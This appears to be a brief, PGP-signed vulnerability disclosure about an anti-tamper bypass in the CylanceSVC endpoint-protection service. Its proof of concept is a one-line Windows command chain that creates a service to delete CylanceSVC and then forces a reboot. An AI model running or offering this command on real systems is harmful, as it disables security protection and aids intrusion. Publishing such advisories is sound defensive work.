CylanceSVC Anti-Tamper Bypass

CylanceSVC suffers from an anti-tamper bypass vulnerability.


MD5 | 1c03266d4c2cfc883d1e8a70facc1117

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

The CylanceSVC service is not sufficiently protected, and the anti-tamper
can be bypassed by creating a service that will delete the CylanceSVC
service.

##POC##

C:\>sc.exe create CyKiller binpath= "C:\Windows\System32\sc.exe delete
CylanceSVC" && sc.exe start CyKiller && shutdown /t 0 /r /f

##POC##
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIcBAEBCgAGBQJal1loAAoJEGoTpzhfiAPxUsgP/1ufgczJqhYZZoKmTKgDPVIb
Uywjxwqzl586wvzRHHiG7pf8KScMAktCRaDgSyeoFIZxMJWjOZurqowvpuoI6rta
w1lAMqPLE6qLbBvuTbcP+uXtinhtK66lfweSviuVbGlWwyHf29HPkUgCjJGrYj4C
IobqDzQkzsfBQi8skgNwKp58Cy9OS9wuRsvQDeGSUopdcMaW+OmGr0Bps27O3QRY
6+NaZ+SiKj+CwDMkadncKLaXorLOr8d/mWVvMjDyoFdP8G4CMb9dsipuRNtMLrbB
q44KN2r4J/CWEbXBWkCjr3xSTfIEHemU6kVp0/fsefFC9/QMSdSej+PuY2MN146U
h0Aqr1p+MAqtBCIwFSrlxio+VIeVa9FobxEbKHoj3Gg+uBas6YqN8N0hQ8abZaO3
jGQkdxJ6Yizb/xZTBHh5GHFhq5sJBTiNy1SHpuUUuJDd7ZvC08pENOnonFUICqy2
F6T8Ke6bqxy8eJt7FJP67YS6d7oyeEnegRGlJbKsbwMqA8F96nJaqcvAIuQDCrl3
285H5U/tvVCtRWsK3FxfsZC5l7POAkPFZMYPO68lVRGu6XytOuPYcZnY3AzG0Iqa
kJDqRzR3HFSmVlMdFhFlzPULbldyFOQZ3dRhXQ4zmgA3IPY/9Fcc2fjhlNFOG2jj
S6QUSQQnvJO44uJOt35C
=zuv1
-----END PGP SIGNATURE-----


Related Posts